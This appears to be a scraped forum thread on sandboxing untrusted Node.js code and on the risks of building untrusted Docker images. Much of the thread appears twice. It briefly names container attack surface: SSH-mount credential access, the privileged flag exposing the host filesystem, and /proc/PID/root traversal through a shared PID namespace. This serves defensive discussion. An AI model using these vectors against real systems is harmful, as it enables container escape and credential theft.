Anyone have advise or links for how to dynamically run untrusted code in production? Specifically NodeJS.
It looks like the isolated-vm package is the go-to, but understandably it prevents things like fetch or being able to import packages.
I’m thinking to use docker and have a single base image that exposes an API that will take an arbitrary string, check for and install imports, then eval (eesh) the code, but before going down the road of implementing it myself and going crazy over properly securing the containers I’m thinking that there has got to be some prior art. How are Codesandbox et al doing it?
If you want to learn more about this subject the keyword you’re looking for is “multitenancy”
Docker’s container runtime is not really a safe way to run untrusted code. I don’t recommend relying on it.
Also, why would an isolated vm prevent fetch? You can give your users NAT addresses to let them make outbound network calls. I am putting the finishing touches on a remote IDE that does exactly that.
Keep docker. As long as you do not expose volumes back to the host system, it is reasonably safe (despite the misconceptions it comes with good security defaults).
If you want to further lock this down, there are many tools such as apparmor and seccomp that you can add custom profiles with but a good starting point would be:
docker run --security-opt no-new-privileges --cap-drop ALL untrusted-image
I'm a bit disappointed. I thought the article would have some discussion on how to actually build untrusted container images in a safe way, but it is really just about how to connect to the Depot API and have it do it for you. I imagine there must be something inside there that answers that part (from some of their other articles, maybe that's BuildKit? unsure).
You're running untrusted code. Every RUN command in a user's Dockerfile is executed during build, which means you're executing arbitrary commands from strangers on your own infrastructure. If you're not isolating that properly, it's a security risk.
Containers in linux are primarily a shipping method (as Docker themselves try to inform you with the visual of a shipping container).
Just like real shipping containers, dangerous things inside can leak out - the isolation is not foolproof by any means, in fact if someone has the express wish of violating the isolation boundary it's barely an inconvenience.
I don't think that's the whole story. There's no documented way to escape the container. The kernel provides namespace isolation which should be foolproof by design. You might argue, that there were many bugs which allowed to escape the container and probably more bugs will be found in the future. However it does not mean, that it's fair to call it "inconvenience". I don't know any zero-day bugs in Linux and probably neither you. And it would take me a lot of effort to even attempt to find one.
I think this is a core reason why containers have such a horrible security track record.
They weren't made by design.
One of the large problems is that there is no "create_container(2)". There are 8? different namespaces in conjunction with cgroups that make up "containers" and they are infinitely configurable. This is problematic and a core reason why we see container escapes almost every other month. Just look at user namespaces - some people use them and some people don't, but it was just a few months ago when multiple bypasses were published for them.
No company today will let you run your own code on their server if the only thing that's sandboxing it are containers. On the other hand, every VPS provider happily lets you do whatever you want inside their VM/hypervisor. This should tell you all you need to know about the security guarantees of Linux containers compared to hypervisors.
Namespaces are not a security feature, they are... namespaces.
In k8s as an example, if you share your PID namespace in a pod, which is a simple config option, you can arbitrarily enter other pod member FS tree with /proc/PID/root, only protected by Unix permissions.
Without seacomp, capabilities, SELinux etc... anyone who can launch a docker container can use the --privlaged flag and change host firmware or view any filesystem including the hosts root.
Focusing on namespace breakout only misses most of the attack surface.
Maybe the default form of RUN is kinda sorta safe [0].
How about ADD? Or COPY? Or RUN —-mount=type=bind,rw…?
Over the last ten years or so we’ve progressed from subtle-ish security holes due to memory unsafety and such to shiny tools in shiny safe languages that have absolutely gaping security and isolation holes by design. Go us.
[0] There is some serious wishful thinking involved there.
This seems to be pretty safe, according to the docs, if I understand them correctly. A bind mount can only mount "context directories" and the rw option will discard the written data, it says.
No way, you're right, they actually tried to make it kind of sensible.
Too bad there's also:
Steal my credentials (temporarily, but still...) to access remote systems without restriction:
RUN --mount=type=ssh
Access TCP and UDP ports without restriction, including anything exported by any other container I'm running, because Docker has no real security model
Build environments are usually "soft targets" in most environments.
Especially ones that utilize a lot of the "CI/CD" pipeline approach.
Lots of secrets getting pulled from various different places, access to testing environments and testing databases needed for unit testing, access to systems that deploy to testing and prod environments. Sensitive code and secrets from multiple applications being used in the same servers and build infrastructure, etc.
So even if you trust containers to containerize securely (which is a bad idea in practice) there are all sorts of holes being poked in them to allow them integrate and access things. Even during building and testing.
Most security effort for most organizations involve hardening parts of production systems that are exposed to users and/or the internet. This not only involves proofing code and setting up firewalls, WAF, and such things, but also monitoring and whatnot.
That is expensive and a lot of work to do, while in build environments it tends to be more slapped together and people ignore them until something breaks.
You have similar situations with backup solutions. People need backups to secure data from corruption or deletion and protect businesses that way, but seeing them as a potential security hole isn't really thought about in the same way as running a production web server. Again it is something that just enough effort is put into to make sure it works and little attention is given to it unless it breaks.
Anyone have advise or links for how to dynamically run untrusted code in production? Specifically NodeJS.
It looks like the isolated-vm package is the go-to, but understandably it prevents things like fetch or being able to import packages.
I’m thinking to use docker and have a single base image that exposes an API that will take an arbitrary string, check for and install imports, then eval (eesh) the code, but before going down the road of implementing it myself and going crazy over properly securing the containers I’m thinking that there has got to be some prior art. How are Codesandbox et al doing it?
I recommend gvisor: https://gvisor.dev/
If you want to learn more about this subject the keyword you’re looking for is “multitenancy”
Docker’s container runtime is not really a safe way to run untrusted code. I don’t recommend relying on it.
Also, why would an isolated vm prevent fetch? You can give your users NAT addresses to let them make outbound network calls. I am putting the finishing touches on a remote IDE that does exactly that.
I would give you a hundred upvotes if I could. This is a fantastic resource, looks perfect for what I want
Keep docker. As long as you do not expose volumes back to the host system, it is reasonably safe (despite the misconceptions it comes with good security defaults).
If you want to further lock this down, there are many tools such as apparmor and seccomp that you can add custom profiles with but a good starting point would be:
docker run --security-opt no-new-privileges --cap-drop ALL untrusted-image
Thanks!
Depending on your criteria, a server like https://github.com/supabase/edge-runtime could be a fit.
What is your threat model / what are you trying to stop from happening?
I want to prevent attempts to example break out of the container into the parent system
Nsjail, firecracker, gVisor, or v8 isolates are all good options with different tradeoffs
I'm a bit disappointed. I thought the article would have some discussion on how to actually build untrusted container images in a safe way, but it is really just about how to connect to the Depot API and have it do it for you. I imagine there must be something inside there that answers that part (from some of their other articles, maybe that's BuildKit? unsure).
I'm confused--what's the security risk in building a container?
Fundamentally building a container involves running a container - each layer is executed in turn as a temporary container.
The same risks that running an unknown container has - are had by building one.
For reference there have been quite a few CVEs related to container escape: https://www.paloaltonetworks.com/blog/cloud-security/leaky-v...
You're running untrusted code. Every RUN command in a user's Dockerfile is executed during build, which means you're executing arbitrary commands from strangers on your own infrastructure. If you're not isolating that properly, it's a security risk.
Inside the container though. The whole point of which is that it sandboxes and isolates the running code.
Containers in linux are primarily a shipping method (as Docker themselves try to inform you with the visual of a shipping container).
Just like real shipping containers, dangerous things inside can leak out - the isolation is not foolproof by any means, in fact if someone has the express wish of violating the isolation boundary it's barely an inconvenience.
I don't think that's the whole story. There's no documented way to escape the container. The kernel provides namespace isolation which should be foolproof by design. You might argue, that there were many bugs which allowed to escape the container and probably more bugs will be found in the future. However it does not mean, that it's fair to call it "inconvenience". I don't know any zero-day bugs in Linux and probably neither you. And it would take me a lot of effort to even attempt to find one.
> should be foolproof by design.
I think this is a core reason why containers have such a horrible security track record.
They weren't made by design.
One of the large problems is that there is no "create_container(2)". There are 8? different namespaces in conjunction with cgroups that make up "containers" and they are infinitely configurable. This is problematic and a core reason why we see container escapes almost every other month. Just look at user namespaces - some people use them and some people don't, but it was just a few months ago when multiple bypasses were published for them.
No company today will let you run your own code on their server if the only thing that's sandboxing it are containers. On the other hand, every VPS provider happily lets you do whatever you want inside their VM/hypervisor. This should tell you all you need to know about the security guarantees of Linux containers compared to hypervisors.
Namespaces are not a security feature, they are... namespaces.
In k8s as an example, if you share your PID namespace in a pod, which is a simple config option, you can arbitrarily enter other pod member FS tree with /proc/PID/root, only protected by Unix permissions.
Without seacomp, capabilities, SELinux etc... anyone who can launch a docker container can use the --privlaged flag and change host firmware or view any filesystem including the hosts root.
Focusing on namespace breakout only misses most of the attack surface.
Linux kernel code has had many zero-days bugs and will continue to do so. Kernel programming is _incredibly_hard and unforgiving.
This blog post[1] explains why that is not a safe assumption.
[1]: https://www.aquasec.com/blog/container-isolation/
Maybe the default form of RUN is kinda sorta safe [0].
How about ADD? Or COPY? Or RUN —-mount=type=bind,rw…?
Over the last ten years or so we’ve progressed from subtle-ish security holes due to memory unsafety and such to shiny tools in shiny safe languages that have absolutely gaping security and isolation holes by design. Go us.
[0] There is some serious wishful thinking involved there.
> Or RUN —-mount=type=bind,rw…?
This seems to be pretty safe, according to the docs, if I understand them correctly. A bind mount can only mount "context directories" and the rw option will discard the written data, it says.
No way, you're right, they actually tried to make it kind of sensible.
Too bad there's also:
Steal my credentials (temporarily, but still...) to access remote systems without restriction:
Access TCP and UDP ports without restriction, including anything exported by any other container I'm running, because Docker has no real security model Outright pwn me, but only if "entitiled":containers are not virtualization. they only provide lightweight isolation as they share the host kernel.
so if you want sandboxing and proper isolation -- use a VM.
https://learn.microsoft.com/en-us/virtualization/windowscont...
The network isn't usually isolated. It build file can arbitrarily switch to the root user
There is some isolation but not complete isolation
Build environments are usually "soft targets" in most environments.
Especially ones that utilize a lot of the "CI/CD" pipeline approach.
Lots of secrets getting pulled from various different places, access to testing environments and testing databases needed for unit testing, access to systems that deploy to testing and prod environments. Sensitive code and secrets from multiple applications being used in the same servers and build infrastructure, etc.
So even if you trust containers to containerize securely (which is a bad idea in practice) there are all sorts of holes being poked in them to allow them integrate and access things. Even during building and testing.
Most security effort for most organizations involve hardening parts of production systems that are exposed to users and/or the internet. This not only involves proofing code and setting up firewalls, WAF, and such things, but also monitoring and whatnot.
That is expensive and a lot of work to do, while in build environments it tends to be more slapped together and people ignore them until something breaks.
You have similar situations with backup solutions. People need backups to secure data from corruption or deletion and protect businesses that way, but seeing them as a potential security hole isn't really thought about in the same way as running a production web server. Again it is something that just enough effort is put into to make sure it works and little attention is given to it unless it breaks.